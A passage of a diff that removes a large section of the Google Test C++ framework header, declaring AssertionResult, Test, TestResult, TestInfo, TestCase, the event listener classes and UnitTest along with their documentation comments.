-  // we want AssertionResult's copy constructor to be used.
-  template <typename T>
-  explicit AssertionResult(
-      const T& success,
-      typename internal::EnableIf<
-          !internal::ImplicitlyConvertible<T, AssertionResult>::value>::type*
-          /*enabler*/ = NULL)
-      : success_(success) {}
-
-  GTEST_DISABLE_MSC_WARNINGS_POP_()
-
-  // Assignment operator.
-  AssertionResult& operator=(AssertionResult other) {
-    swap(other);
-    return *this;
-  }
-
-  // Returns true iff the assertion succeeded.
-  operator bool() const { return success_; }  // NOLINT
-
-  // Returns the assertion's negation. Used with EXPECT/ASSERT_FALSE.
-  AssertionResult operator!() const;
-
-  // Returns the text streamed into this AssertionResult. Test assertions
-  // use it when they fail (i.e., the predicate's outcome doesn't match the
-  // assertion's expectation). When nothing has been streamed into the
-  // object, returns an empty string.
-  const char* message() const {
-    return message_.get() != NULL ?  message_->c_str() : "";
-  }
-  // TODO(vladl@google.com): Remove this after making sure no clients use it.
-  // Deprecated; please use message() instead.
-  const char* failure_message() const { return message(); }
-
-  // Streams a custom failure message into this object.
-  template <typename T> AssertionResult& operator<<(const T& value) {
-    AppendMessage(Message() << value);
-    return *this;
-  }
-
-  // Allows streaming basic output manipulators such as endl or flush into
-  // this object.
-  AssertionResult& operator<<(
-      ::std::ostream& (*basic_manipulator)(::std::ostream& stream)) {
-    AppendMessage(Message() << basic_manipulator);
-    return *this;
-  }
-
- private:
-  // Appends the contents of message to message_.
-  void AppendMessage(const Message& a_message) {
-    if (message_.get() == NULL)
-      message_.reset(new ::std::string);
-    message_->append(a_message.GetString().c_str());
-  }
-
-  // Swap the contents of this AssertionResult with other.
-  void swap(AssertionResult& other);
-
-  // Stores result of the assertion predicate.
-  bool success_;
-  // Stores the message describing the condition in case the expectation
-  // construct is not satisfied with the predicate's outcome.
-  // Referenced via a pointer to avoid taking too much stack frame space
-  // with test assertions.
-  internal::scoped_ptr< ::std::string> message_;
-};
-
-// Makes a successful assertion result.
-GTEST_API_ AssertionResult AssertionSuccess();
-
-// Makes a failed assertion result.
-GTEST_API_ AssertionResult AssertionFailure();
-
-// Makes a failed assertion result with the given failure message.
-// Deprecated; use AssertionFailure() << msg.
-GTEST_API_ AssertionResult AssertionFailure(const Message& msg);
-
-// The abstract class that all tests inherit from.
-//
-// In Google Test, a unit test program contains one or many TestCases, and
-// each TestCase contains one or many Tests.
-//
-// When you define a test using the TEST macro, you don't need to
-// explicitly derive from Test - the TEST macro automatically does
-// this for you.
-//
-// The only time you derive from Test is when defining a test fixture
-// to be used a TEST_F.  For example:
-//
-//   class FooTest : public testing::Test {
-//    protected:
-//     void SetUp() override { ... }
-//     void TearDown() override { ... }
-//     ...
-//   };
-//
-//   TEST_F(FooTest, Bar) { ... }
-//   TEST_F(FooTest, Baz) { ... }
-//
-// Test is not copyable.
-class GTEST_API_ Test {
- public:
-  friend class TestInfo;
-
-  // Defines types for pointers to functions that set up and tear down
-  // a test case.
-  typedef internal::SetUpTestCaseFunc SetUpTestCaseFunc;
-  typedef internal::TearDownTestCaseFunc TearDownTestCaseFunc;
-
-  // The d'tor is virtual as we intend to inherit from Test.
-  virtual ~Test();
-
-  // Sets up the stuff shared by all tests in this test case.
-  //
-  // Google Test will call Foo::SetUpTestCase() before running the first
-  // test in test case Foo.  Hence a sub-class can define its own
-  // SetUpTestCase() method to shadow the one defined in the super
-  // class.
-  static void SetUpTestCase() {}
-
-  // Tears down the stuff shared by all tests in this test case.
-  //
-  // Google Test will call Foo::TearDownTestCase() after running the last
-  // test in test case Foo.  Hence a sub-class can define its own
-  // TearDownTestCase() method to shadow the one defined in the super
-  // class.
-  static void TearDownTestCase() {}
-
-  // Returns true iff the current test has a fatal failure.
-  static bool HasFatalFailure();
-
-  // Returns true iff the current test has a non-fatal failure.
-  static bool HasNonfatalFailure();
-
-  // Returns true iff the current test has a (either fatal or
-  // non-fatal) failure.
-  static bool HasFailure() { return HasFatalFailure() || HasNonfatalFailure(); }
-
-  // Logs a property for the current test, test case, or for the entire
-  // invocation of the test program when used outside of the context of a
-  // test case.  Only the last value for a given key is remembered.  These
-  // are public static so they can be called from utility functions that are
-  // not members of the test fixture.  Calls to RecordProperty made during
-  // lifespan of the test (from the moment its constructor starts to the
-  // moment its destructor finishes) will be output in XML as attributes of
-  // the <testcase> element.  Properties recorded from fixture's
-  // SetUpTestCase or TearDownTestCase are logged as attributes of the
-  // corresponding <testsuite> element.  Calls to RecordProperty made in the
-  // global context (before or after invocation of RUN_ALL_TESTS and from
-  // SetUp/TearDown method of Environment objects registered with Google
-  // Test) will be output as attributes of the <testsuites> element.
-  static void RecordProperty(const std::string& key, const std::string& value);
-  static void RecordProperty(const std::string& key, int value);
-
- protected:
-  // Creates a Test object.
-  Test();
-
-  // Sets up the test fixture.
-  virtual void SetUp();
-
-  // Tears down the test fixture.
-  virtual void TearDown();
-
- private:
-  // Returns true iff the current test has the same fixture class as
-  // the first test in the current test case.
-  static bool HasSameFixtureClass();
-
-  // Runs the test after the test fixture has been set up.
-  //
-  // A sub-class must implement this to define the test logic.
-  //
-  // DO NOT OVERRIDE THIS FUNCTION DIRECTLY IN A USER PROGRAM.
-  // Instead, use the TEST or TEST_F macro.
-  virtual void TestBody() = 0;
-
-  // Sets up, executes, and tears down the test.
-  void Run();
-
-  // Deletes self.  We deliberately pick an unusual name for this
-  // internal method to avoid clashing with names used in user TESTs.
-  void DeleteSelf_() { delete this; }
-
-  // Uses a GTestFlagSaver to save and restore all Google Test flags.
-  const internal::GTestFlagSaver* const gtest_flag_saver_;
-
-  // Often a user misspells SetUp() as Setup() and spends a long time
-  // wondering why it is never called by Google Test.  The declaration of
-  // the following method is solely for catching such an error at
-  // compile time:
-  //
-  //   - The return type is deliberately chosen to be not void, so it
-  //   will be a conflict if void Setup() is declared in the user's
-  //   test fixture.
-  //
-  //   - This method is private, so it will be another compiler error
-  //   if the method is called from the user's test fixture.
-  //
-  // DO NOT OVERRIDE THIS FUNCTION.
-  //
-  // If you see an error about overriding the following function or
-  // about it being private, you have mis-spelled SetUp() as Setup().
-  struct Setup_should_be_spelled_SetUp {};
-  virtual Setup_should_be_spelled_SetUp* Setup() { return NULL; }
-
-  // We disallow copying Tests.
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(Test);
-};
-
-typedef internal::TimeInMillis TimeInMillis;
-
-// A copyable object representing a user specified test property which can be
-// output as a key/value string pair.
-//
-// Don't inherit from TestProperty as its destructor is not virtual.
-class TestProperty {
- public:
-  // C'tor.  TestProperty does NOT have a default constructor.
-  // Always use this constructor (with parameters) to create a
-  // TestProperty object.
-  TestProperty(const std::string& a_key, const std::string& a_value) :
-    key_(a_key), value_(a_value) {
-  }
-
-  // Gets the user supplied key.
-  const char* key() const {
-    return key_.c_str();
-  }
-
-  // Gets the user supplied value.
-  const char* value() const {
-    return value_.c_str();
-  }
-
-  // Sets a new value, overriding the one supplied in the constructor.
-  void SetValue(const std::string& new_value) {
-    value_ = new_value;
-  }
-
- private:
-  // The key supplied by the user.
-  std::string key_;
-  // The value supplied by the user.
-  std::string value_;
-};
-
-// The result of a single Test.  This includes a list of
-// TestPartResults, a list of TestProperties, a count of how many
-// death tests there are in the Test, and how much time it took to run
-// the Test.
-//
-// TestResult is not copyable.
-class GTEST_API_ TestResult {
- public:
-  // Creates an empty TestResult.
-  TestResult();
-
-  // D'tor.  Do not inherit from TestResult.
-  ~TestResult();
-
-  // Gets the number of all test parts.  This is the sum of the number
-  // of successful test parts and the number of failed test parts.
-  int total_part_count() const;
-
-  // Returns the number of the test properties.
-  int test_property_count() const;
-
-  // Returns true iff the test passed (i.e. no test part failed).
-  bool Passed() const { return !Failed(); }
-
-  // Returns true iff the test failed.
-  bool Failed() const;
-
-  // Returns true iff the test fatally failed.
-  bool HasFatalFailure() const;
-
-  // Returns true iff the test has a non-fatal failure.
-  bool HasNonfatalFailure() const;
-
-  // Returns the elapsed time, in milliseconds.
-  TimeInMillis elapsed_time() const { return elapsed_time_; }
-
-  // Returns the i-th test part result among all the results. i can range
-  // from 0 to test_property_count() - 1. If i is not in that range, aborts
-  // the program.
-  const TestPartResult& GetTestPartResult(int i) const;
-
-  // Returns the i-th test property. i can range from 0 to
-  // test_property_count() - 1. If i is not in that range, aborts the
-  // program.
-  const TestProperty& GetTestProperty(int i) const;
-
- private:
-  friend class TestInfo;
-  friend class TestCase;
-  friend class UnitTest;
-  friend class internal::DefaultGlobalTestPartResultReporter;
-  friend class internal::ExecDeathTest;
-  friend class internal::TestResultAccessor;
-  friend class internal::UnitTestImpl;
-  friend class internal::WindowsDeathTest;
-
-  // Gets the vector of TestPartResults.
-  const std::vector<TestPartResult>& test_part_results() const {
-    return test_part_results_;
-  }
-
-  // Gets the vector of TestProperties.
-  const std::vector<TestProperty>& test_properties() const {
-    return test_properties_;
-  }
-
-  // Sets the elapsed time.
-  void set_elapsed_time(TimeInMillis elapsed) { elapsed_time_ = elapsed; }
-
-  // Adds a test property to the list. The property is validated and may add
-  // a non-fatal failure if invalid (e.g., if it conflicts with reserved
-  // key names). If a property is already recorded for the same key, the
-  // value will be updated, rather than storing multiple values for the same
-  // key.  xml_element specifies the element for which the property is being
-  // recorded and is used for validation.
-  void RecordProperty(const std::string& xml_element,
-                      const TestProperty& test_property);
-
-  // Adds a failure if the key is a reserved attribute of Google Test
-  // testcase tags.  Returns true if the property is valid.
-  // TODO(russr): Validate attribute names are legal and human readable.
-  static bool ValidateTestProperty(const std::string& xml_element,
-                                   const TestProperty& test_property);
-
-  // Adds a test part result to the list.
-  void AddTestPartResult(const TestPartResult& test_part_result);
-
-  // Returns the death test count.
-  int death_test_count() const { return death_test_count_; }
-
-  // Increments the death test count, returning the new count.
-  int increment_death_test_count() { return ++death_test_count_; }
-
-  // Clears the test part results.
-  void ClearTestPartResults();
-
-  // Clears the object.
-  void Clear();
-
-  // Protects mutable state of the property vector and of owned
-  // properties, whose values may be updated.
-  internal::Mutex test_properites_mutex_;
-
-  // The vector of TestPartResults
-  std::vector<TestPartResult> test_part_results_;
-  // The vector of TestProperties
-  std::vector<TestProperty> test_properties_;
-  // Running count of death tests.
-  int death_test_count_;
-  // The elapsed time, in milliseconds.
-  TimeInMillis elapsed_time_;
-
-  // We disallow copying TestResult.
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestResult);
-};  // class TestResult
-
-// A TestInfo object stores the following information about a test:
-//
-//   Test case name
-//   Test name
-//   Whether the test should be run
-//   A function pointer that creates the test object when invoked
-//   Test result
-//
-// The constructor of TestInfo registers itself with the UnitTest
-// singleton such that the RUN_ALL_TESTS() macro knows which tests to
-// run.
-class GTEST_API_ TestInfo {
- public:
-  // Destructs a TestInfo object.  This function is not virtual, so
-  // don't inherit from TestInfo.
-  ~TestInfo();
-
-  // Returns the test case name.
-  const char* test_case_name() const { return test_case_name_.c_str(); }
-
-  // Returns the test name.
-  const char* name() const { return name_.c_str(); }
-
-  // Returns the name of the parameter type, or NULL if this is not a typed
-  // or a type-parameterized test.
-  const char* type_param() const {
-    if (type_param_.get() != NULL)
-      return type_param_->c_str();
-    return NULL;
-  }
-
-  // Returns the text representation of the value parameter, or NULL if this
-  // is not a value-parameterized test.
-  const char* value_param() const {
-    if (value_param_.get() != NULL)
-      return value_param_->c_str();
-    return NULL;
-  }
-
-  // Returns true if this test should run, that is if the test is not
-  // disabled (or it is disabled but the also_run_disabled_tests flag has
-  // been specified) and its full name matches the user-specified filter.
-  //
-  // Google Test allows the user to filter the tests by their full names.
-  // The full name of a test Bar in test case Foo is defined as
-  // "Foo.Bar".  Only the tests that match the filter will run.
-  //
-  // A filter is a colon-separated list of glob (not regex) patterns,
-  // optionally followed by a '-' and a colon-separated list of
-  // negative patterns (tests to exclude).  A test is run if it
-  // matches one of the positive patterns and does not match any of
-  // the negative patterns.
-  //
-  // For example, *A*:Foo.* is a filter that matches any string that
-  // contains the character 'A' or starts with "Foo.".
-  bool should_run() const { return should_run_; }
-
-  // Returns true iff this test will appear in the XML report.
-  bool is_reportable() const {
-    // For now, the XML report includes all tests matching the filter.
-    // In the future, we may trim tests that are excluded because of
-    // sharding.
-    return matches_filter_;
-  }
-
-  // Returns the result of the test.
-  const TestResult* result() const { return &result_; }
-
- private:
-#if GTEST_HAS_DEATH_TEST
-  friend class internal::DefaultDeathTestFactory;
-#endif  // GTEST_HAS_DEATH_TEST
-  friend class Test;
-  friend class TestCase;
-  friend class internal::UnitTestImpl;
-  friend class internal::StreamingListenerTest;
-  friend TestInfo* internal::MakeAndRegisterTestInfo(
-      const char* test_case_name,
-      const char* name,
-      const char* type_param,
-      const char* value_param,
-      internal::TypeId fixture_class_id,
-      Test::SetUpTestCaseFunc set_up_tc,
-      Test::TearDownTestCaseFunc tear_down_tc,
-      internal::TestFactoryBase* factory);
-
-  // Constructs a TestInfo object. The newly constructed instance assumes
-  // ownership of the factory object.
-  TestInfo(const std::string& test_case_name,
-           const std::string& name,
-           const char* a_type_param,   // NULL if not a type-parameterized test
-           const char* a_value_param,  // NULL if not a value-parameterized test
-           internal::TypeId fixture_class_id,
-           internal::TestFactoryBase* factory);
-
-  // Increments the number of death tests encountered in this test so
-  // far.
-  int increment_death_test_count() {
-    return result_.increment_death_test_count();
-  }
-
-  // Creates the test object, runs it, records its result, and then
-  // deletes it.
-  void Run();
-
-  static void ClearTestResult(TestInfo* test_info) {
-    test_info->result_.Clear();
-  }
-
-  // These fields are immutable properties of the test.
-  const std::string test_case_name_;     // Test case name
-  const std::string name_;               // Test name
-  // Name of the parameter type, or NULL if this is not a typed or a
-  // type-parameterized test.
-  const internal::scoped_ptr<const ::std::string> type_param_;
-  // Text representation of the value parameter, or NULL if this is not a
-  // value-parameterized test.
-  const internal::scoped_ptr<const ::std::string> value_param_;
-  const internal::TypeId fixture_class_id_;   // ID of the test fixture class
-  bool should_run_;                 // True iff this test should run
-  bool is_disabled_;                // True iff this test is disabled
-  bool matches_filter_;             // True if this test matches the
-                                    // user-specified filter.
-  internal::TestFactoryBase* const factory_;  // The factory that creates
-                                              // the test object
-
-  // This field is mutable and needs to be reset before running the
-  // test for the second time.
-  TestResult result_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestInfo);
-};
-
-// A test case, which consists of a vector of TestInfos.
-//
-// TestCase is not copyable.
-class GTEST_API_ TestCase {
- public:
-  // Creates a TestCase with the given name.
-  //
-  // TestCase does NOT have a default constructor.  Always use this
-  // constructor to create a TestCase object.
-  //
-  // Arguments:
-  //
-  //   name:         name of the test case
-  //   a_type_param: the name of the test's type parameter, or NULL if
-  //                 this is not a type-parameterized test.
-  //   set_up_tc:    pointer to the function that sets up the test case
-  //   tear_down_tc: pointer to the function that tears down the test case
-  TestCase(const char* name, const char* a_type_param,
-           Test::SetUpTestCaseFunc set_up_tc,
-           Test::TearDownTestCaseFunc tear_down_tc);
-
-  // Destructor of TestCase.
-  virtual ~TestCase();
-
-  // Gets the name of the TestCase.
-  const char* name() const { return name_.c_str(); }
-
-  // Returns the name of the parameter type, or NULL if this is not a
-  // type-parameterized test case.
-  const char* type_param() const {
-    if (type_param_.get() != NULL)
-      return type_param_->c_str();
-    return NULL;
-  }
-
-  // Returns true if any test in this test case should run.
-  bool should_run() const { return should_run_; }
-
-  // Gets the number of successful tests in this test case.
-  int successful_test_count() const;
-
-  // Gets the number of failed tests in this test case.
-  int failed_test_count() const;
-
-  // Gets the number of disabled tests that will be reported in the XML report.
-  int reportable_disabled_test_count() const;
-
-  // Gets the number of disabled tests in this test case.
-  int disabled_test_count() const;
-
-  // Gets the number of tests to be printed in the XML report.
-  int reportable_test_count() const;
-
-  // Get the number of tests in this test case that should run.
-  int test_to_run_count() const;
-
-  // Gets the number of all tests in this test case.
-  int total_test_count() const;
-
-  // Returns true iff the test case passed.
-  bool Passed() const { return !Failed(); }
-
-  // Returns true iff the test case failed.
-  bool Failed() const { return failed_test_count() > 0; }
-
-  // Returns the elapsed time, in milliseconds.
-  TimeInMillis elapsed_time() const { return elapsed_time_; }
-
-  // Returns the i-th test among all the tests. i can range from 0 to
-  // total_test_count() - 1. If i is not in that range, returns NULL.
-  const TestInfo* GetTestInfo(int i) const;
-
-  // Returns the TestResult that holds test properties recorded during
-  // execution of SetUpTestCase and TearDownTestCase.
-  const TestResult& ad_hoc_test_result() const { return ad_hoc_test_result_; }
-
- private:
-  friend class Test;
-  friend class internal::UnitTestImpl;
-
-  // Gets the (mutable) vector of TestInfos in this TestCase.
-  std::vector<TestInfo*>& test_info_list() { return test_info_list_; }
-
-  // Gets the (immutable) vector of TestInfos in this TestCase.
-  const std::vector<TestInfo*>& test_info_list() const {
-    return test_info_list_;
-  }
-
-  // Returns the i-th test among all the tests. i can range from 0 to
-  // total_test_count() - 1. If i is not in that range, returns NULL.
-  TestInfo* GetMutableTestInfo(int i);
-
-  // Sets the should_run member.
-  void set_should_run(bool should) { should_run_ = should; }
-
-  // Adds a TestInfo to this test case.  Will delete the TestInfo upon
-  // destruction of the TestCase object.
-  void AddTestInfo(TestInfo * test_info);
-
-  // Clears the results of all tests in this test case.
-  void ClearResult();
-
-  // Clears the results of all tests in the given test case.
-  static void ClearTestCaseResult(TestCase* test_case) {
-    test_case->ClearResult();
-  }
-
-  // Runs every test in this TestCase.
-  void Run();
-
-  // Runs SetUpTestCase() for this TestCase.  This wrapper is needed
-  // for catching exceptions thrown from SetUpTestCase().
-  void RunSetUpTestCase() { (*set_up_tc_)(); }
-
-  // Runs TearDownTestCase() for this TestCase.  This wrapper is
-  // needed for catching exceptions thrown from TearDownTestCase().
-  void RunTearDownTestCase() { (*tear_down_tc_)(); }
-
-  // Returns true iff test passed.
-  static bool TestPassed(const TestInfo* test_info) {
-    return test_info->should_run() && test_info->result()->Passed();
-  }
-
-  // Returns true iff test failed.
-  static bool TestFailed(const TestInfo* test_info) {
-    return test_info->should_run() && test_info->result()->Failed();
-  }
-
-  // Returns true iff the test is disabled and will be reported in the XML
-  // report.
-  static bool TestReportableDisabled(const TestInfo* test_info) {
-    return test_info->is_reportable() && test_info->is_disabled_;
-  }
-
-  // Returns true iff test is disabled.
-  static bool TestDisabled(const TestInfo* test_info) {
-    return test_info->is_disabled_;
-  }
-
-  // Returns true iff this test will appear in the XML report.
-  static bool TestReportable(const TestInfo* test_info) {
-    return test_info->is_reportable();
-  }
-
-  // Returns true if the given test should run.
-  static bool ShouldRunTest(const TestInfo* test_info) {
-    return test_info->should_run();
-  }
-
-  // Shuffles the tests in this test case.
-  void ShuffleTests(internal::Random* random);
-
-  // Restores the test order to before the first shuffle.
-  void UnshuffleTests();
-
-  // Name of the test case.
-  std::string name_;
-  // Name of the parameter type, or NULL if this is not a typed or a
-  // type-parameterized test.
-  const internal::scoped_ptr<const ::std::string> type_param_;
-  // The vector of TestInfos in their original order.  It owns the
-  // elements in the vector.
-  std::vector<TestInfo*> test_info_list_;
-  // Provides a level of indirection for the test list to allow easy
-  // shuffling and restoring the test order.  The i-th element in this
-  // vector is the index of the i-th test in the shuffled test list.
-  std::vector<int> test_indices_;
-  // Pointer to the function that sets up the test case.
-  Test::SetUpTestCaseFunc set_up_tc_;
-  // Pointer to the function that tears down the test case.
-  Test::TearDownTestCaseFunc tear_down_tc_;
-  // True iff any test in this test case should run.
-  bool should_run_;
-  // Elapsed time, in milliseconds.
-  TimeInMillis elapsed_time_;
-  // Holds test properties recorded during execution of SetUpTestCase and
-  // TearDownTestCase.
-  TestResult ad_hoc_test_result_;
-
-  // We disallow copying TestCases.
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestCase);
-};
-
-// An Environment object is capable of setting up and tearing down an
-// environment.  You should subclass this to define your own
-// environment(s).
-//
-// An Environment object does the set-up and tear-down in virtual
-// methods SetUp() and TearDown() instead of the constructor and the
-// destructor, as:
-//
-//   1. You cannot safely throw from a destructor.  This is a problem
-//      as in some cases Google Test is used where exceptions are enabled, and
-//      we may want to implement ASSERT_* using exceptions where they are
-//      available.
-//   2. You cannot use ASSERT_* directly in a constructor or
-//      destructor.
-class Environment {
- public:
-  // The d'tor is virtual as we need to subclass Environment.
-  virtual ~Environment() {}
-
-  // Override this to define how to set up the environment.
-  virtual void SetUp() {}
-
-  // Override this to define how to tear down the environment.
-  virtual void TearDown() {}
- private:
-  // If you see an error about overriding the following function or
-  // about it being private, you have mis-spelled SetUp() as Setup().
-  struct Setup_should_be_spelled_SetUp {};
-  virtual Setup_should_be_spelled_SetUp* Setup() { return NULL; }
-};
-
-// The interface for tracing execution of tests. The methods are organized in
-// the order the corresponding events are fired.
-class TestEventListener {
- public:
-  virtual ~TestEventListener() {}
-
-  // Fired before any test activity starts.
-  virtual void OnTestProgramStart(const UnitTest& unit_test) = 0;
-
-  // Fired before each iteration of tests starts.  There may be more than
-  // one iteration if GTEST_FLAG(repeat) is set. iteration is the iteration
-  // index, starting from 0.
-  virtual void OnTestIterationStart(const UnitTest& unit_test,
-                                    int iteration) = 0;
-
-  // Fired before environment set-up for each iteration of tests starts.
-  virtual void OnEnvironmentsSetUpStart(const UnitTest& unit_test) = 0;
-
-  // Fired after environment set-up for each iteration of tests ends.
-  virtual void OnEnvironmentsSetUpEnd(const UnitTest& unit_test) = 0;
-
-  // Fired before the test case starts.
-  virtual void OnTestCaseStart(const TestCase& test_case) = 0;
-
-  // Fired before the test starts.
-  virtual void OnTestStart(const TestInfo& test_info) = 0;
-
-  // Fired after a failed assertion or a SUCCEED() invocation.
-  virtual void OnTestPartResult(const TestPartResult& test_part_result) = 0;
-
-  // Fired after the test ends.
-  virtual void OnTestEnd(const TestInfo& test_info) = 0;
-
-  // Fired after the test case ends.
-  virtual void OnTestCaseEnd(const TestCase& test_case) = 0;
-
-  // Fired before environment tear-down for each iteration of tests starts.
-  virtual void OnEnvironmentsTearDownStart(const UnitTest& unit_test) = 0;
-
-  // Fired after environment tear-down for each iteration of tests ends.
-  virtual void OnEnvironmentsTearDownEnd(const UnitTest& unit_test) = 0;
-
-  // Fired after each iteration of tests finishes.
-  virtual void OnTestIterationEnd(const UnitTest& unit_test,
-                                  int iteration) = 0;
-
-  // Fired after all test activities have ended.
-  virtual void OnTestProgramEnd(const UnitTest& unit_test) = 0;
-};
-
-// The convenience class for users who need to override just one or two
-// methods and are not concerned that a possible change to a signature of
-// the methods they override will not be caught during the build.  For
-// comments about each method please see the definition of TestEventListener
-// above.
-class EmptyTestEventListener : public TestEventListener {
- public:
-  virtual void OnTestProgramStart(const UnitTest& /*unit_test*/) {}
-  virtual void OnTestIterationStart(const UnitTest& /*unit_test*/,
-                                    int /*iteration*/) {}
-  virtual void OnEnvironmentsSetUpStart(const UnitTest& /*unit_test*/) {}
-  virtual void OnEnvironmentsSetUpEnd(const UnitTest& /*unit_test*/) {}
-  virtual void OnTestCaseStart(const TestCase& /*test_case*/) {}
-  virtual void OnTestStart(const TestInfo& /*test_info*/) {}
-  virtual void OnTestPartResult(const TestPartResult& /*test_part_result*/) {}
-  virtual void OnTestEnd(const TestInfo& /*test_info*/) {}
-  virtual void OnTestCaseEnd(const TestCase& /*test_case*/) {}
-  virtual void OnEnvironmentsTearDownStart(const UnitTest& /*unit_test*/) {}
-  virtual void OnEnvironmentsTearDownEnd(const UnitTest& /*unit_test*/) {}
-  virtual void OnTestIterationEnd(const UnitTest& /*unit_test*/,
-                                  int /*iteration*/) {}
-  virtual void OnTestProgramEnd(const UnitTest& /*unit_test*/) {}
-};
-
-// TestEventListeners lets users add listeners to track events in Google Test.
-class GTEST_API_ TestEventListeners {
- public:
-  TestEventListeners();
-  ~TestEventListeners();
-
-  // Appends an event listener to the end of the list. Google Test assumes
-  // the ownership of the listener (i.e. it will delete the listener when
-  // the test program finishes).
-  void Append(TestEventListener* listener);
-
-  // Removes the given event listener from the list and returns it.  It then
-  // becomes the caller's responsibility to delete the listener. Returns
-  // NULL if the listener is not found in the list.
-  TestEventListener* Release(TestEventListener* listener);
-
-  // Returns the standard listener responsible for the default console
-  // output.  Can be removed from the listeners list to shut down default
-  // console output.  Note that removing this object from the listener list
-  // with Release transfers its ownership to the caller and makes this
-  // function return NULL the next time.
-  TestEventListener* default_result_printer() const {
-    return default_result_printer_;
-  }
-
-  // Returns the standard listener responsible for the default XML output
-  // controlled by the --gtest_output=xml flag.  Can be removed from the
-  // listeners list by users who want to shut down the default XML output
-  // controlled by this flag and substitute it with custom one.  Note that
-  // removing this object from the listener list with Release transfers its
-  // ownership to the caller and makes this function return NULL the next
-  // time.
-  TestEventListener* default_xml_generator() const {
-    return default_xml_generator_;
-  }
-
- private:
-  friend class TestCase;
-  friend class TestInfo;
-  friend class internal::DefaultGlobalTestPartResultReporter;
-  friend class internal::NoExecDeathTest;
-  friend class internal::TestEventListenersAccessor;
-  friend class internal::UnitTestImpl;
-
-  // Returns repeater that broadcasts the TestEventListener events to all
-  // subscribers.
-  TestEventListener* repeater();
-
-  // Sets the default_result_printer attribute to the provided listener.
-  // The listener is also added to the listener list and previous
-  // default_result_printer is removed from it and deleted. The listener can
-  // also be NULL in which case it will not be added to the list. Does
-  // nothing if the previous and the current listener objects are the same.
-  void SetDefaultResultPrinter(TestEventListener* listener);
-
-  // Sets the default_xml_generator attribute to the provided listener.  The
-  // listener is also added to the listener list and previous
-  // default_xml_generator is removed from it and deleted. The listener can
-  // also be NULL in which case it will not be added to the list. Does
-  // nothing if the previous and the current listener objects are the same.
-  void SetDefaultXmlGenerator(TestEventListener* listener);
-
-  // Controls whether events will be forwarded by the repeater to the
-  // listeners in the list.
-  bool EventForwardingEnabled() const;
-  void SuppressEventForwarding();
-
-  // The actual list of listeners.
-  internal::TestEventRepeater* repeater_;
-  // Listener responsible for the standard result output.
-  TestEventListener* default_result_printer_;
-  // Listener responsible for the creation of the XML output file.
-  TestEventListener* default_xml_generator_;
-
-  // We disallow copying TestEventListeners.
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestEventListeners);
-};
-
-// A UnitTest consists of a vector of TestCases.
-//
-// This is a singleton class.  The only instance of UnitTest is
-// created when UnitTest::GetInstance() is first called.  This
-// instance is never deleted.
-//
-// UnitTest is not copyable.
-//
-// This class is thread-safe as long as the methods are called
-// according to their specification.
-class GTEST_API_ UnitTest {
- public:
-  // Gets the singleton UnitTest object.  The first time this method
-  // is called, a UnitTest object is constructed and returned.
-  // Consecutive calls will return the same object.
-  static UnitTest* GetInstance();
-
-  // Runs all tests in this UnitTest object and prints the result.
-  // Returns 0 if successful, or 1 otherwise.
-  //
-  // This method can only be called from the main thread.
-  //
-  // INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-  int Run() GTEST_MUST_USE_RESULT_;
-
-  // Returns the working directory when the first TEST() or TEST_F()
-  // was executed.  The UnitTest object owns the string.
-  const char* original_working_dir() const;
-
-  // Returns the TestCase object for the test that's currently running,
-  // or NULL if no test is running.
-  const TestCase* current_test_case() const
-      GTEST_LOCK_EXCLUDED_(mutex_);
-
-  // Returns the TestInfo object for the test that's currently running,
-  // or NULL if no test is running.
-  const TestInfo* current_test_info() const
-      GTEST_LOCK_EXCLUDED_(mutex_);
-
-  // Returns the random seed used at the start of the current test run.
-  int random_seed() const;
-
-#if GTEST_HAS_PARAM_TEST
-  // Returns the ParameterizedTestCaseRegistry object used to keep track of
-  // value-parameterized tests and instantiate and register them.
-  //
-  // INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-  internal::ParameterizedTestCaseRegistry& parameterized_test_registry()
-      GTEST_LOCK_EXCLUDED_(mutex_);
-#endif  // GTEST_HAS_PARAM_TEST
-
-  // Gets the number of successful test cases.
-  int successful_test_case_count() const;
-
-  // Gets the number of failed test cases.
-  int failed_test_case_count() const;
-
-  // Gets the number of all test cases.
-  int total_test_case_count() const;
-
-  // Gets the number of all test cases that contain at least one test
-  // that should run.
-  int test_case_to_run_count() const;
-
-  // Gets the number of successful tests.
-  int successful_test_count() const;
-
-  // Gets the number of failed tests.
-  int failed_test_count() const;
-
-  // Gets the number of disabled tests that will be reported in the XML report.
-  int reportable_disabled_test_count() const;
-
-  // Gets the number of disabled tests.
-  int disabled_test_count() const;
-
-  // Gets the number of tests to be printed in the XML report.
-  int reportable_test_count() const;
-
-  // Gets the number of all tests.
-  int total_test_count() const;
-
-  // Gets the number of tests that should run.
-  int test_to_run_count() const;
-
-  // Gets the time of the test program start, in ms from the start of the
-  // UNIX epoch.
-  TimeInMillis start_timestamp() const;
-
-  // Gets the elapsed time, in milliseconds.
-  TimeInMillis elapsed_time() const;
-
-  // Returns true iff the unit test passed (i.e. all test cases passed).
-  bool Passed() const;
-
-  // Returns true iff the unit test failed (i.e. some test case failed
-  // or something outside of all tests failed).
-  bool Failed() const;
-
-  // Gets the i-th test case among all the test cases. i can range from 0 to
-  // total_test_case_count() - 1. If i is not in that range, returns NULL.
-  const TestCase* GetTestCase(int i) const;
-
-  // Returns the TestResult containing information on test failures and
-  // properties logged outside of individual test cases.
-  const TestResult& ad_hoc_test_result() const;
-
-  // Returns the list of event listeners that can be used to track events
-  // inside Google Test.
-  TestEventListeners& listeners();
-
- private:
-  // Registers and returns a global test environment.  When a test
-  // program is run, all global test environments will be set-up in
-  // the order they were registered.  After all tests in the program
-  // have finished, all global test environments will be torn-down in
-  // the *reverse* order they were registered.
-  //
-  // The UnitTest object takes ownership of the given environment.
-  //
-  // This method can only be called from the main thread.
-  Environment* AddEnvironment(Environment* env);
-
-  // Adds a TestPartResult to the current TestResult object.  All
-  // Google Test assertion macros (e.g. ASSERT_TRUE, EXPECT_EQ, etc)
-  // eventually call this to report their results.  The user code
-  // should use the assertion macros instead of calling this directly.
-  void AddTestPartResult(TestPartResult::Type result_type,
-                         const char* file_name,
-                         int line_number,
-                         const std::string& message,
-                         const std::string& os_stack_trace)
